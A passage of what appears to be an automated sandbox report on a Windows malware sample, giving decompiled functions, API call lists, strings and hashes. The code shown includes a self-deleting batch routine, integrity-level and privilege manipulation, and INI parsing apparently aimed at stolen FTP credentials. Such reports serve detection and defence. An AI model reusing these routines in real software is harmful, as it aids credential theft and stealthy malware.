					return E00417C6F( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x00417e84
0x00417f76
0x00000000
0x00417f76
0x00417e98
0x00417ea4
0x00417ebc
0x00417f6a
0x00417f71
0x00000000
0x00417f71
0x00417ece
0x00417ed8
0x00417ee0
0x00000000
0x00000000
0x00417ee6
0x00417eed
0x00417f09
0x00000000
0x00417f2a
0x00417f2c
0x00417f34
0x00417f3c
0x00417f54
0x00417f57
0x00000000
0x00417f65

APIs

Part of subcall function 0041B726: GetTempPathW.KERNEL32(000000F6,?), ref: 0041B73D

CharToOemW.USER32 ref: 00417E98

Part of subcall function 0041B55A: CreateFileW.KERNEL32(00417E82,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B574
Part of subcall function 0041B55A: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B597
Part of subcall function 0041B55A: CloseHandle.KERNEL32(00000000,?,0041B799,00417E82,00000000,00000000,00417E82,?), ref: 0041B5A4

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F1C

Strings

bat, xrefs: 00417E78
@echo off%sdel /F "%s", xrefs: 00417EAB
ComSpec, xrefs: 00417F17
/c "%s", xrefs: 00417EEE

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 8b61006d3b09432e9c488e848f97d69f859d58a4acfec2040584f181bacd857f
Instruction ID: b5292adf52b9b25521904c90738d61d5b1307400b8583d15660041982185abb3
Opcode Fuzzy Hash: 8b61006d3b09432e9c488e848f97d69f859d58a4acfec2040584f181bacd857f
Instruction Fuzzy Hash: A72185B19052096ADB10DBA4CC85FEF73BCEB44314F104167B608E2191E6789BCA8B68

Uniqueness

Uniqueness Score: -1.00%

Function 00417AFC, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00417AFC(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E00416378(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E004163A8(_t32);
					goto L12;
				}
			}

0x00417b0a
0x00417b14
0x00417baa
0x00417bae
0x00417bae
0x00417b30
0x00417ba0
0x00417ba3
0x00000000
0x00417b3d
0x00417b46
0x00417b4a
0x00417b9f
0x00000000
0x00417b9f
0x00417b5d
0x00417b61
0x00417b69
0x00417b6b
0x00417b6f
0x00417b78
0x00417b80
0x00417b89
0x00417b94
0x00417b96
0x00417b8b
0x00417b8b
0x00417b8b
0x00417b89
0x00417b80
0x00417b6f
0x00417b69
0x00417b9a
0x00000000
0x00417b9a

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B0C
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B2C
GetLastError.KERNEL32(?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B32
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B59
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B61
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417B78
CloseHandle.KERNEL32(?,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00417BA3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: e19b61e6665ae69856c8db5720c7b52f8b71fe9158816b22c65cdc973e07eda0
Instruction ID: e7584ebe7203c9437e8928a546317e1d6c502364da8885f54ba81c069cc89ad8
Opcode Fuzzy Hash: e19b61e6665ae69856c8db5720c7b52f8b71fe9158816b22c65cdc973e07eda0
Instruction Fuzzy Hash: F611D0B160810ABFEB105B91DD84EFE3B7DDB45354F100467F510E6162D739AEC5AB28

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8C2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8C2(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0041A727(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x0041a8e7
0x0041a8ea
0x0041a8ec
0x0041a8ee
0x0041a8f7
0x0041a8fa
0x0041a903
0x0041a920
0x00000000
0x0041a922
0x0041a925
0x0041a92b
0x0041a938
0x00000000
0x00000000
0x00000000
0x0041a92b
0x0041a93c
0x0041a93f
0x00000000
0x0041a92d
0x0041a92d
0x0041a930
0x00000000
0x0041a936
0x0041a942
0x0041a948

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0041A8EA

Part of subcall function 0041A727: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A848

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0041A91C
RegCloseKey.ADVAPI32(?), ref: 0041A925
RegCloseKey.ADVAPI32(?), ref: 0041A93F

Strings

d, xrefs: 0041A930
SOFTWARE\Microsoft, xrefs: 0041A8DD

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: e20f60c1211e805c65eb7a710195401493c590f5543fdb91481e3d3edbb39ff6
Instruction ID: 3ddabdde60e63dc9cc8459f4f124f8720fc6b1ad5dbd9f6b4d0aefc74b31ff05
Opcode Fuzzy Hash: e20f60c1211e805c65eb7a710195401493c590f5543fdb91481e3d3edbb39ff6
Instruction Fuzzy Hash: D2115BB590120DBEEB029B948D81EFFBB7CEF04388F104067F901B6260D2759E958B75

Uniqueness

Uniqueness Score: -1.00%

Function 00419A29, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00419A29(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E00417A74(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x00419a35
0x00419a37
0x00419a3d
0x00419a48
0x00419a50
0x00419a61
0x00419a64
0x00419a6c
0x00419a7b
0x00419a83
0x00419a85
0x00419a85
0x00419a83
0x00419a8a
0x00419a8a
0x00419a94

APIs

Part of subcall function 00417A74: GetCurrentThread.KERNEL32 ref: 00417A84
Part of subcall function 00417A74: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
Part of subcall function 00417A74: OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00419A48
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00419A64
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00419A7B
LocalFree.KERNEL32(?), ref: 00419A8A

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00419A43
SeSecurityPrivilege, xrefs: 00419A30

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 2de9f30c2b527670f1b16a64b0b50ea5ddee59a57887ca4d8b0b84e7ed5b7d6e
Instruction ID: 43c2eb3a89c2a4d4ca9d023c22bd5654cb62dff96fa4c3df7968098ece0f5996
Opcode Fuzzy Hash: 2de9f30c2b527670f1b16a64b0b50ea5ddee59a57887ca4d8b0b84e7ed5b7d6e
Instruction Fuzzy Hash: EE0131B568024CBFDB119FE08D85FEF7B7CAF04785F000166F641F11A1D6759E949A28

Uniqueness

Uniqueness Score: -1.00%

Function 0040D091, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040D091(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E0040CFB2(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E0040CE22(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E0040CE22(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040801F(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E0040CFB2(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x0040d091
0x0040d094
0x0040d098
0x0040d09b
0x0040d0a3
0x0040d0c0
0x0040d0c8
0x00000000
0x00000000
0x0040d0ca
0x0040d0e5
0x0040d0ed
0x0040d103
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d109
0x0040d109
0x0040d109
0x0040d11f
0x0040d127
0x0040d12e
0x0040d159
0x0040d15e
0x0040d161
0x0040d164
0x0040d27b
0x0040d27e
0x0040d2c3
0x0040d2c8
0x0040d2f3
0x0040d2f8
0x0040d212
0x0040d216
0x0040d216
0x0040d2fe
0x0040d300
0x0040d300
0x0040d303
0x00000000
0x00000000
0x0040d309
0x0040d30c
0x0040d201
0x0040d201
0x0040d207
0x0040d208
0x0040d20d
0x0040d210
0x00000000
0x0040d210
0x0040d312
0x0040d312
0x0040d315
0x0040d318
0x00000000
0x0040d318
0x0040d2cd
0x0040d2d0
0x0040d2d5
0x00000000
0x00000000
0x0040d2e2
0x0040d2ee
0x00000000
0x0040d2ee
0x0040d280
0x0040d1cf
0x0040d1cf
0x0040d1d2
0x0040d14d
0x0040d14d
0x00000000
0x0040d14d
0x0040d286
0x0040d289
0x0040d23d
0x0040d23d
0x0040d242
0x0040d256
0x0040d256
0x00000000
0x0040d242
0x0040d28b
0x0040d28e
0x0040d2ae
0x0040d2b3
0x0040d1a7
0x0040d1a7
0x0040d1ac
0x0040d1ac
0x00000000
0x00000000
0x00000000
0x0040d1ae
0x0040d1fc
0x0040d1fc
0x00000000
0x0040d1fc
0x0040d290
0x0040d293
0x00000000
0x00000000
0x0040d299
0x0040d29e
0x00000000
0x00000000
0x0040d2a4
0x00000000
0x0040d2a4
0x0040d16a
0x0040d25d
0x0040d262
0x00000000
0x00000000
0x0040d268
0x0040d26b
0x0040d272
0x00000000
0x00000000
0x0040d274
0x00000000
0x0040d274
0x0040d170
0x0040d173
0x0040d22b
0x0040d230
0x00000000
0x00000000
0x0040d232
0x0040d237
0x00000000
0x00000000
0x00000000
0x0040d237
0x0040d179
0x0040d17c
0x0040d1f5
0x0040d1fa
0x0040d219
0x0040d21e
0x00000000
0x00000000
0x0040d224
0x00000000
0x0040d224
0x00000000
0x0040d1fa
0x0040d17e
0x0040d181
0x0040d1d8
0x0040d1dd
0x0040d1e8
0x0040d1ed
0x00000000
0x00000000
0x0040d1ef
0x0040d1f1
0x0040d1e3
0x0040d1e3
0x00000000
0x0040d1e3
0x0040d1df
0x0040d1e1
0x00000000
0x0040d1e1
0x0040d186
0x0040d189
0x00000000
0x00000000
0x0040d18b
0x0040d190
0x0040d1c4
0x0040d1c9
0x0040d1cc
0x00000000
0x0040d1cc
0x0040d192
0x0040d197
0x00000000
0x00000000
0x0040d199
0x0040d19e
0x00000000
0x00000000
0x0040d1a0
0x0040d1a5
0x00000000
0x00000000
0x00000000
0x0040d1a5
0x0040d136
0x0040d13b
0x0040d141
0x0040d148
0x00000000
0x0040d148

APIs

GetAncestor.USER32(?,00000002), ref: 0040D0BA
SendMessageTimeoutW.USER32 ref: 0040D0E5
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040D127
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D1BD
PostMessageW.USER32(?,00000112,?,?), ref: 0040D210
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D24F

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 49878a142090244006c251e49161f07209667365ced38fe98a0b07f463ca0886
Instruction ID: 198dd98362e5fd40c7db13aeaf45b29576d091dbbe8615e43912838c8c19b01e
Opcode Fuzzy Hash: 49878a142090244006c251e49161f07209667365ced38fe98a0b07f463ca0886
Instruction Fuzzy Hash: 4A51BF34E00304AAEF345EC8CC89BBE3625EB55310F24447BF951FA2E1C67DC999A65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B409, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B409(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E00416378(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E004163A8(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00417258(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E00416378(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E0040FA33(_t61,  &_v584);
						_t63 = 0x73;
						E0040FA33(_t63,  &_v596);
						_t65 = 0x74;
						E0040FA33(_t65,  &_v608);
						_t67 = 0x75;
						E0040FA33(_t67,  &_v624);
						_t69 = 0x76;
						E0040FA33(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E00417294(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E00416EF7(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E0040FA33(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E0041709B(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E0041679C(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E004163A8(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E0040B3D1(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x0040b40f
0x0040b42d
0x0040b623
0x0040b62b
0x0040b62b
0x0040b433
0x0040b436
0x0040b457
0x0040b45b
0x0040b45f
0x0040b461
0x00000000
0x00000000
0x0040b47e
0x0040b480
0x0040b482
0x0040b61d
0x0040b61e
0x00000000
0x0040b61e
0x0040b488
0x0040b48d
0x0040b492
0x0040b494
0x00000000
0x00000000
0x0040b4a4
0x0040b4a6
0x0040b4aa
0x0040b4ac
0x0040b4b2
0x0040b4ba
0x0040b4be
0x0040b4c6
0x0040b4c7
0x0040b4d2
0x0040b4d3
0x0040b4de
0x0040b4df
0x0040b4ea
0x0040b4eb
0x0040b4f6
0x0040b4f7
0x0040b4fc
0x0040b5f9
0x0040b5ff
0x0040b604
0x0040b608
0x0040b60a
0x0040b4fe
0x0040b502
0x0040b50b
0x0040b511
0x0040b513
0x0040b533
0x0040b535
0x0040b537
0x0040b550
0x0040b556
0x0040b55b
0x0040b560
0x0040b56f
0x0040b581
0x0040b583
0x0040b585
0x0040b590
0x0040b590
0x0040b5a2
0x0040b5a4
0x0040b5a6
0x0040b5aa
0x0040b5af
0x0040b5b1
0x0040b5b5
0x0040b5b9
0x0040b5ba
0x0040b5bf
0x0040b5c3
0x0040b5c9
0x0040b5d3
0x0040b5d4
0x0040b5db
0x0040b5e0
0x0040b5e3
0x0040b5e5
0x0040b5e7
0x0040b5ed
0x0040b5f2
0x0040b5f4
0x0040b5f6
0x0040b5f6
0x0040b5f6
0x0040b5f6
0x0040b5f4
0x0040b5e5
0x0040b5b1
0x0040b5a6
0x0040b585
0x0040b560
0x0040b537
0x00000000
0x0040b513
0x0040b614
0x0040b619
0x0040b619
0x00000000
0x0040b438
0x0040b443
0x00000000
0x0040b443

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

GetPrivateProfileStringW.KERNEL32 ref: 0040B47E
StrStrIW.SHLWAPI(?,?), ref: 0040B50B
GetPrivateProfileStringW.KERNEL32 ref: 0040B533
GetPrivateProfileIntW.KERNEL32 ref: 0040B550
GetPrivateProfileStringW.KERNEL32 ref: 0040B581

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: b407eab06b79c92b2718c3a96af049aaddf62d2bc0c9616bac5767c8e238d513
Instruction ID: 4fdda50b45c44acdabd490307c0ff366f63c859c8d6f016ec9fea7bcaf125901
Opcode Fuzzy Hash: b407eab06b79c92b2718c3a96af049aaddf62d2bc0c9616bac5767c8e238d513
Instruction Fuzzy Hash: 92518632504706ABDA10DB55DC01FEBB7E8EF84708F00493EB988E3291DB79D949879A

Uniqueness

Uniqueness Score: -1.00%

Function 00407421, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407421(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
